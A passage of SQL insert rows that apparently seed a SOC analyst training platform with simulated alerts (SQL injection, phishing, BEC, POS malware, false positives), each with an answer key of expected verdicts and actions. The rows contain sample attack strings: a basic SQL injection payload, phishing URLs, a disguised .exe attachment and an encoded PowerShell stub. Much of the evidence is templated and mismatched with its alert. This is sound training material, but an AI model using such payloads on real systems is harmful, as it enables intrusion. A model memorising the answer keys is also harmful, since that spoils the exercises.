ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:15:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"8.8.8.8\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"GOV-LAPTOP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.507Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:15:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"8.8.8.8\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"GOV-LAPTOP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.507Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:15:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"8.8.8.8\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"GOV-LAPTOP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.507Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:15:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"8.8.8.8\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"GOV-LAPTOP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.507Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:15:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"8.8.8.8\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"GOV-LAPTOP01\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(847, 'SQL Injection Attempt Blocked', 'high', 'Wazuh', 'A SQL injection attempt was detected and blocked by the web application firewall.', 'Web Attack', 'T1190', 0, 'Closed', 233, '{\"timestamp\":\"2026-01-14T11:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"192.168.1.150\",\"hostname\":\"GOV-WEB01\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-14 15:21:38', '2026-03-03 12:15:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple web-based attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected.\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"SQL injection attempt confirmed by payload and IP reputation.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.508Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.1.150\\\",\\\"hostname\\\":\\\"GOV-WEB01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.508Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.1.150\\\",\\\"hostname\\\":\\\"GOV-WEB01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.508Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.1.150\\\",\\\"hostname\\\":\\\"GOV-WEB01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.508Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.1.150\\\",\\\"hostname\\\":\\\"GOV-WEB01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.508Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.1.150\\\",\\\"hostname\\\":\\\"GOV-WEB01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(848, 'False Positive - Unusual Network Activity', 'low', 'Firewall', 'Unusual network activity detected due to a legitimate software update process, initially flagged as suspicious.', 'Network Anomaly', 'T1071', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-14T12:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.120\",\"dst_ip\":\"203.0.113.88\",\"hostname\":\"GOV-UPDATE01\",\"command_line\":\"C:\\\\Program Files\\\\Updater\\\\update.exe\"}', '2026-01-14 15:21:38', '2026-03-03 12:17:09', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.120\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the update server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"Activity confirmed as part of a legitimate software update process.\"}', 'Beginner', 'EDR', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(849, 'Credential Harvesting Attempt via Phishing Email', 'high', 'Proofpoint', 'A phishing email targeting user credentials was detected. The email contained a malicious link disguised as an Office365 login page.', 'Phishing', 'T1566', 1, 'Closed', 225, '{\"timestamp\":\"2026-01-14T09:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.50\",\"username\":\"jane.doe@retailcorp.com\",\"hostname\":\"mailserver.retailcorp.com\",\"email_sender\":\"no-reply@office365-login.com\",\"url\":\"http://office365-login.com/login\"}', '2026-01-14 15:31:54', '2026-03-06 10:15:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 500 times for phishing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://office365-login.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Known phishing URL targeting Office365 credentials\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"no-reply@office365-login.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Spoofed domain used for phishing campaigns\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contained a known phishing URL and originated from a malicious IP.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Credential Harvesting Attempt via Phishing Email\",\"date\":\"2026-02-01T20:32:22.511Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(850, 'SQL Injection Attempt Detected on E-commerce Platform', 'critical', 'Wazuh', 'A web request containing SQL injection payload was detected on the payment processing page of the e-commerce site.', 'Web Attack', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T11:30:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"45.33.32.156\",\"dst_ip\":\"192.168.1.45\",\"hostname\":\"webserver.ecommerce.com\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-14 15:31:54', '2026-02-16 17:57:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.33.32.156\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request body contained a clear SQL injection payload targeting the payment page.\"}', 'Beginner', 'EDR', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.512Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:30:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"45.33.32.156\\\",\\\"dst_ip\\\":\\\"192.168.1.45\\\",\\\"hostname\\\":\\\"webserver.ecommerce.com\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.512Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET 
/login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:30:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"45.33.32.156\\\",\\\"dst_ip\\\":\\\"192.168.1.45\\\",\\\"hostname\\\":\\\"webserver.ecommerce.com\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.512Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:30:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"45.33.32.156\\\",\\\"dst_ip\\\":\\\"192.168.1.45\\\",\\\"hostname\\\":\\\"webserver.ecommerce.com\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.512Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:30:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"45.33.32.156\\\",\\\"dst_ip\\\":\\\"192.168.1.45\\\",\\\"hostname\\\":\\\"webserver.ecommerce.com\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.512Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T11:30:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"45.33.32.156\\\",\\\"dst_ip\\\":\\\"192.168.1.45\\\",\\\"hostname\\\":\\\"webserver.ecommerce.com\\\",\\\"request_body\\\":\\\"\' 
OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(851, 'Suspicious Login Attempt from Foreign IP', 'medium', 'Splunk', 'Multiple failed login attempts detected for a user account from an unusual foreign IP address.', 'Credential Attack', 'T1078', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T12:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.234.217.40\",\"username\":\"john.smith\",\"hostname\":\"auth.retailcorp.com\",\"failed_attempts\":15}', '2026-01-14 15:31:54', '2026-02-16 16:54:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.234.217.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with suspicious login activity\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP is known for suspicious activity, and the user reported unexpected login attempts.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.513Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.234.217.40\\\",\\\"username\\\":\\\"john.smith\\\",\\\"hostname\\\":\\\"auth.retailcorp.com\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:31:22.513Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.234.217.40\\\",\\\"username\\\":\\\"john.smith\\\",\\\"hostname\\\":\\\"auth.retailcorp.com\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:30:22.513Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.234.217.40\\\",\\\"username\\\":\\\"john.smith\\\",\\\"hostname\\\":\\\"auth.retailcorp.com\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:29:22.513Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.234.217.40\\\",\\\"username\\\":\\\"john.smith\\\",\\\"hostname\\\":\\\"auth.retailcorp.com\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:28:22.513Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.234.217.40\\\",\\\"username\\\":\\\"john.smith\\\",\\\"hostname\\\":\\\"auth.retailcorp.com\\\",\\\"failed_attempts\\\":15}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(852, 'BEC Attempt Detected with CEO Impersonation', 'high', 'Proofpoint', 'An email attempting to impersonate the CEO was detected. The email requested a wire transfer to an unfamiliar account.', 'Phishing', 'T1566', 1, 'Closed', 297, '{\"timestamp\":\"2026-01-14T08:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"195.154.200.25\",\"username\":\"finance@retailcorp.com\",\"hostname\":\"mailserver.retailcorp.com\",\"email_sender\":\"ceo@reta1lcorp.com\",\"email_subject\":\"Urgent: Wire Transfer Request\"}', '2026-01-14 15:31:54', '2026-03-15 11:50:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"195.154.200.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple BEC attempts\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"ceo@reta1lcorp.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Spoofed domain used for CEO impersonation\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email used a lookalike domain to impersonate the CEO for financial fraud.\"}', 'Beginner', 'CORE', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"BEC Attempt Detected with CEO Impersonation\",\"date\":\"2026-02-01T20:32:22.515Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(853, 'Malware Execution Detected on POS System', 'critical', 'CrowdStrike', 'Suspicious process execution detected on a POS system. The process is associated with known POS malware.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T10:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.75\",\"hostname\":\"pos-terminal-01\",\"command_line\":\"C:\\\\Windows\\\\system32\\\\posmalware.exe\",\"file_hash\":\"3a4b1c2d5e6f7g8h9i0j1k2l3m4n5o6p\"}', '2026-01-14 15:31:54', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal POS terminal\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\system32\\\\posmalware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known POS malware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a4b1c2d5e6f7g8h9i0j1k2l3m4n5o6p\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as POS malware variant\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash and command line match known POS malware signatures.\"}', 'Beginner', 'EDR', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(854, 'False Positive: Legitimate QR Code Scanning Detected', 'low', 'IDS', 'A QR code scanning event was detected. The activity was identified as part of a legitimate marketing campaign.', 'Web Request', 'T1566', 0, 'Closed', 225, '{\"timestamp\":\"2026-01-14T13:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"192.168.100.100\",\"hostname\":\"qrscanner.retailcorp.com\",\"url\":\"https://marketing.retailcorp.com/qrcampaign\"}', '2026-01-14 15:31:54', '2026-03-05 22:34:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with marketing activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://marketing.retailcorp.com/qrcampaign\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL verified as part of a legitimate marketing campaign\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The URL and source IP are associated with a legitimate marketing campaign.\"}', 'Beginner', 'TI', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.517Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"192.168.100.100\\\",\\\"hostname\\\":\\\"qrscanner.retailcorp.com\\\",\\\"url\\\":\\\"https://marketing.retailcorp.com/qrcampaign\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.517Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"192.168.100.100\\\",\\\"hostname\\\":\\\"qrscanner.retailcorp.com\\\",\\\"url\\\":\\\"https://marketing.retailcorp.com/qrcampaign\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.517Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"192.168.100.100\\\",\\\"hostname\\\":\\\"qrscanner.retailcorp.com\\\",\\\"url\\\":\\\"https://marketing.retailcorp.com/qrcampaign\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.517Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"192.168.100.100\\\",\\\"hostname\\\":\\\"qrscanner.retailcorp.com\\\",\\\"url\\\":\\\"https://marketing.retailcorp.com/qrcampaign\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.517Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 